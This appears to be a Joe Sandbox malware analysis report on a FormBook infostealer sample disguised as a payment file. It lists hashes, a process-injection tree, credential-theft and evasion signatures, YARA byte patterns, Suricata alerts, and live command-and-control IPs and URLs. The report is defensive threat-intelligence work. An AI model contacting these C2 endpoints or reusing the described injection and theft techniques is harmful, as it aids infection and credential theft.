Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PAGO $830.900.exe

Overview

General Information

Sample name:PAGO $830.900.exe
Analysis ID:1513227
MD5:39c39d298ac66acb85c47e7a647bac4e
SHA1:a2d7ec0eaa52cd8287926c198052dbd99e7366a1
SHA256:79a2f729b9a56bea58b706b9246e46d6204ae30c549fdbe6bc044e80624947e3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PAGO $830.900.exe (PID: 5040 cmdline: "C:\Users\user\Desktop\PAGO $830.900.exe" MD5: 39C39D298AC66ACB85C47E7A647BAC4E)
    • svchost.exe (PID: 768 cmdline: "C:\Users\user\Desktop\PAGO $830.900.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • XXOIkqUXwzoOEy.exe (PID: 3012 cmdline: "C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 3748 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • XXOIkqUXwzoOEy.exe (PID: 1788 cmdline: "C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1600 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.4479452466.0000000003220000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.4479452466.0000000003220000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bd00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13f2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000006.00000002.4482452521.0000000004C80000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.4482452521.0000000004C80000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x399e2:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x21c11:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000004.00000002.4479040765.0000000002D80000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2df63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16192:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2ed63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16f92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\PAGO $830.900.exe", CommandLine: "C:\Users\user\Desktop\PAGO $830.900.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PAGO $830.900.exe", ParentImage: C:\Users\user\Desktop\PAGO $830.900.exe, ParentProcessId: 5040, ParentProcessName: PAGO $830.900.exe, ProcessCommandLine: "C:\Users\user\Desktop\PAGO $830.900.exe", ProcessId: 768, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\PAGO $830.900.exe", CommandLine: "C:\Users\user\Desktop\PAGO $830.900.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PAGO $830.900.exe", ParentImage: C:\Users\user\Desktop\PAGO $830.900.exe, ParentProcessId: 5040, ParentProcessName: PAGO $830.900.exe, ProcessCommandLine: "C:\Users\user\Desktop\PAGO $830.900.exe", ProcessId: 768, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-18T16:18:05.577568+020020507451Malware Command and Control Activity Detected192.168.2.553614148.72.152.17480TCP
            2024-09-18T16:18:29.917543+020020507451Malware Command and Control Activity Detected192.168.2.5536183.33.130.19080TCP
            2024-09-18T16:18:43.557979+020020507451Malware Command and Control Activity Detected192.168.2.553622172.191.244.6280TCP
            2024-09-18T16:18:57.440579+020020507451Malware Command and Control Activity Detected192.168.2.553626172.96.191.3980TCP
            2024-09-18T16:19:11.055033+020020507451Malware Command and Control Activity Detected192.168.2.553630217.70.184.5080TCP
            2024-09-18T16:19:25.013615+020020507451Malware Command and Control Activity Detected192.168.2.55363463.250.47.4080TCP
            2024-09-18T16:19:38.348985+020020507451Malware Command and Control Activity Detected192.168.2.55363891.184.0.20080TCP
            2024-09-18T16:19:51.502607+020020507451Malware Command and Control Activity Detected192.168.2.55364213.248.169.4880TCP
            2024-09-18T16:20:19.922706+020020507451Malware Command and Control Activity Detected192.168.2.55365043.242.202.16980TCP
            2024-09-18T16:20:34.796371+020020507451Malware Command and Control Activity Detected192.168.2.553654103.224.182.24280TCP
            2024-09-18T16:20:48.479195+020020507451Malware Command and Control Activity Detected192.168.2.55365885.159.66.9380TCP
            2024-09-18T16:21:02.598834+020020507451Malware Command and Control Activity Detected192.168.2.553662188.114.97.380TCP
            2024-09-18T16:21:16.091718+020020507451Malware Command and Control Activity Detected192.168.2.55366613.248.169.4880TCP
            2024-09-18T16:21:45.848266+020020507451Malware Command and Control Activity Detected192.168.2.553670148.72.152.17480TCP
            2024-09-18T16:21:58.973358+020020507451Malware Command and Control Activity Detected192.168.2.5536743.33.130.19080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-18T16:18:05.577568+020028554651A Network Trojan was detected192.168.2.553614148.72.152.17480TCP
            2024-09-18T16:18:29.917543+020028554651A Network Trojan was detected192.168.2.5536183.33.130.19080TCP
            2024-09-18T16:18:43.557979+020028554651A Network Trojan was detected192.168.2.553622172.191.244.6280TCP
            2024-09-18T16:18:57.440579+020028554651A Network Trojan was detected192.168.2.553626172.96.191.3980TCP
            2024-09-18T16:19:11.055033+020028554651A Network Trojan was detected192.168.2.553630217.70.184.5080TCP
            2024-09-18T16:19:25.013615+020028554651A Network Trojan was detected192.168.2.55363463.250.47.4080TCP
            2024-09-18T16:19:38.348985+020028554651A Network Trojan was detected192.168.2.55363891.184.0.20080TCP
            2024-09-18T16:19:51.502607+020028554651A Network Trojan was detected192.168.2.55364213.248.169.4880TCP
            2024-09-18T16:20:19.922706+020028554651A Network Trojan was detected192.168.2.55365043.242.202.16980TCP
            2024-09-18T16:20:34.796371+020028554651A Network Trojan was detected192.168.2.553654103.224.182.24280TCP
            2024-09-18T16:20:48.479195+020028554651A Network Trojan was detected192.168.2.55365885.159.66.9380TCP
            2024-09-18T16:21:02.598834+020028554651A Network Trojan was detected192.168.2.553662188.114.97.380TCP
            2024-09-18T16:21:16.091718+020028554651A Network Trojan was detected192.168.2.55366613.248.169.4880TCP
            2024-09-18T16:21:45.848266+020028554651A Network Trojan was detected192.168.2.553670148.72.152.17480TCP
            2024-09-18T16:21:58.973358+020028554651A Network Trojan was detected192.168.2.5536743.33.130.19080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-18T16:18:21.156053+020028554641A Network Trojan was detected192.168.2.5536153.33.130.19080TCP
            2024-09-18T16:18:24.120594+020028554641A Network Trojan was detected192.168.2.5536163.33.130.19080TCP
            2024-09-18T16:18:26.381761+020028554641A Network Trojan was detected192.168.2.5536173.33.130.19080TCP
            2024-09-18T16:18:35.831964+020028554641A Network Trojan was detected192.168.2.553619172.191.244.6280TCP
            2024-09-18T16:18:38.680882+020028554641A Network Trojan was detected192.168.2.553620172.191.244.6280TCP
            2024-09-18T16:18:41.008552+020028554641A Network Trojan was detected192.168.2.553621172.191.244.6280TCP
            2024-09-18T16:18:49.784798+020028554641A Network Trojan was detected192.168.2.553623172.96.191.3980TCP
            2024-09-18T16:18:52.296428+020028554641A Network Trojan was detected192.168.2.553624172.96.191.3980TCP
            2024-09-18T16:18:54.881727+020028554641A Network Trojan was detected192.168.2.553625172.96.191.3980TCP
            2024-09-18T16:19:03.216710+020028554641A Network Trojan was detected192.168.2.553627217.70.184.5080TCP
            2024-09-18T16:19:05.792242+020028554641A Network Trojan was detected192.168.2.553628217.70.184.5080TCP
            2024-09-18T16:19:08.348795+020028554641A Network Trojan was detected192.168.2.553629217.70.184.5080TCP
            2024-09-18T16:19:17.368469+020028554641A Network Trojan was detected192.168.2.55363163.250.47.4080TCP
            2024-09-18T16:19:19.914771+020028554641A Network Trojan was detected192.168.2.55363263.250.47.4080TCP
            2024-09-18T16:19:22.516389+020028554641A Network Trojan was detected192.168.2.55363363.250.47.4080TCP
            2024-09-18T16:19:30.690959+020028554641A Network Trojan was detected192.168.2.55363591.184.0.20080TCP
            2024-09-18T16:19:33.214822+020028554641A Network Trojan was detected192.168.2.55363691.184.0.20080TCP
            2024-09-18T16:19:35.871779+020028554641A Network Trojan was detected192.168.2.55363791.184.0.20080TCP
            2024-09-18T16:19:43.847494+020028554641A Network Trojan was detected192.168.2.55363913.248.169.4880TCP
            2024-09-18T16:19:46.397678+020028554641A Network Trojan was detected192.168.2.55364013.248.169.4880TCP
            2024-09-18T16:19:48.946030+020028554641A Network Trojan was detected192.168.2.55364113.248.169.4880TCP
            2024-09-18T16:20:11.912872+020028554641A Network Trojan was detected192.168.2.55364743.242.202.16980TCP
            2024-09-18T16:20:14.674893+020028554641A Network Trojan was detected192.168.2.55364843.242.202.16980TCP
            2024-09-18T16:20:17.276409+020028554641A Network Trojan was detected192.168.2.55364943.242.202.16980TCP
            2024-09-18T16:20:26.996004+020028554641A Network Trojan was detected192.168.2.553651103.224.182.24280TCP
            2024-09-18T16:20:29.401854+020028554641A Network Trojan was detected192.168.2.553652103.224.182.24280TCP
            2024-09-18T16:20:32.377082+020028554641A Network Trojan was detected192.168.2.553653103.224.182.24280TCP
            2024-09-18T16:20:41.459514+020028554641A Network Trojan was detected192.168.2.55365585.159.66.9380TCP
            2024-09-18T16:20:44.006797+020028554641A Network Trojan was detected192.168.2.55365685.159.66.9380TCP
            2024-09-18T16:20:46.552932+020028554641A Network Trojan was detected192.168.2.55365785.159.66.9380TCP
            2024-09-18T16:20:54.781314+020028554641A Network Trojan was detected192.168.2.553659188.114.97.380TCP
            2024-09-18T16:20:57.207720+020028554641A Network Trojan was detected192.168.2.553660188.114.97.380TCP
            2024-09-18T16:20:59.708283+020028554641A Network Trojan was detected192.168.2.553661188.114.97.380TCP
            2024-09-18T16:21:08.364978+020028554641A Network Trojan was detected192.168.2.55366313.248.169.4880TCP
            2024-09-18T16:21:10.922448+020028554641A Network Trojan was detected192.168.2.55366413.248.169.4880TCP
            2024-09-18T16:21:13.470593+020028554641A Network Trojan was detected192.168.2.55366513.248.169.4880TCP
            2024-09-18T16:21:38.233370+020028554641A Network Trojan was detected192.168.2.553667148.72.152.17480TCP
            2024-09-18T16:21:40.764371+020028554641A Network Trojan was detected192.168.2.553668148.72.152.17480TCP
            2024-09-18T16:21:43.352378+020028554641A Network Trojan was detected192.168.2.553669148.72.152.17480TCP
            2024-09-18T16:21:51.341563+020028554641A Network Trojan was detected192.168.2.5536713.33.130.19080TCP
            2024-09-18T16:21:54.000396+020028554641A Network Trojan was detected192.168.2.5536723.33.130.19080TCP
            2024-09-18T16:21:56.455893+020028554641A Network Trojan was detected192.168.2.5536733.33.130.19080TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.omexai.info/7xi5/?x0wHoJ8X=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELNT/uLCDt5nHY4Z1aiDsGH/lUra2tZ4EmQmJJAAh8o7sfXQ==&2VDlJ=Z2VdhTxAvira URL Cloud: Label: malware
            Source: http://www.elsupertodo.net/2jit/?x0wHoJ8X=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1fIExehuCYopzYdrD7nSEUYrIRB0qkneaQhNiSOa9oBZv5w==&2VDlJ=Z2VdhTxAvira URL Cloud: Label: malware
            Source: http://www.elsupertodo.net/2jit/Avira URL Cloud: Label: malware
            Source: http://www.tekilla.wtf/fpzw/Avira URL Cloud: Label: malware
            Source: http://www.omexai.info/7xi5/Avira URL Cloud: Label: malware
            Source: http://www.tekilla.wtf/fpzw/?2VDlJ=Z2VdhTx&x0wHoJ8X=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyV8YvjGskVquY7O4GS1YJERNPT4cclYTval7UCV/4UAiTeAA==Avira URL Cloud: Label: malware
            Source: https://www.elsupertodo.net/2jit/?x0wHoJ8X=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutleAvira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: PAGO $830.900.exeReversingLabs: Detection: 62%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4479452466.0000000003220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4482452521.0000000004C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4479040765.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4480467614.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2236251136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2237968521.0000000003E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2238057070.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4480505595.0000000004270000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: PAGO $830.900.exeJoe Sandbox ML: detected
            Source: PAGO $830.900.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XXOIkqUXwzoOEy.exe, 00000003.00000000.2155456066.00000000006BE000.00000002.00000001.01000000.00000004.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4479745513.00000000006BE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: PAGO $830.900.exe, 00000000.00000003.2045771670.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, PAGO $830.900.exe, 00000000.00000003.2045918029.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2137653598.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2237383010.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2237383010.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2139562708.0000000003900000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2239500272.0000000003703000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2236327251.000000000355E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4480765561.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4480765561.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PAGO $830.900.exe, 00000000.00000003.2045771670.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, PAGO $830.900.exe, 00000000.00000003.2045918029.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2137653598.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2237383010.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2237383010.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2139562708.0000000003900000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000003.2239500272.0000000003703000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2236327251.000000000355E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4480765561.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4480765561.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.2236959150.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2204810568.000000000341A000.00000004.00000020.00020000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000003.00000002.4479988906.0000000000748000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4479582993.00000000032AE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4481211759.0000000003EDC000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.000000000284C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2631846308.0000000010E8C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4479582993.00000000032AE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4481211759.0000000003EDC000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.000000000284C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2631846308.0000000010E8C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.2236959150.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2204810568.000000000341A000.00000004.00000020.00020000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000003.00000002.4479988906.0000000000748000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DDDADC lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00DDDADC
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DAC242 FindFirstFileExW,0_2_00DAC242
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DE68AD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00DE68AD
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DE680C FindFirstFileW,FindClose,0_2_00DE680C
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DDCF94 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00DDCF94
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DDD2C7 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00DDD2C7
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DE9560 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00DE9560
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DE96BB SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00DE96BB
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DE9A49 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00DE9A49
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DE5BB5 FindFirstFileW,FindNextFileW,FindClose,0_2_00DE5BB5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02D9C2C0 FindFirstFileW,FindNextFileW,FindClose,4_2_02D9C2C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then xor eax, eax4_2_02D89B90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then pop edi4_2_02DA2399
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then mov ebx, 00000004h4_2_036004DE

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53623 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53655 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53619 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53660 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53648 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53625 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53615 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53640 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53656 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53633 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53637 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53616 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53652 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53631 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:53630 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53649 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:53614 -> 148.72.152.174:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53629 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53635 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53614 -> 148.72.152.174:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:53662 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53662 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53621 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:53654 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53617 -> 3.33.130.190:80
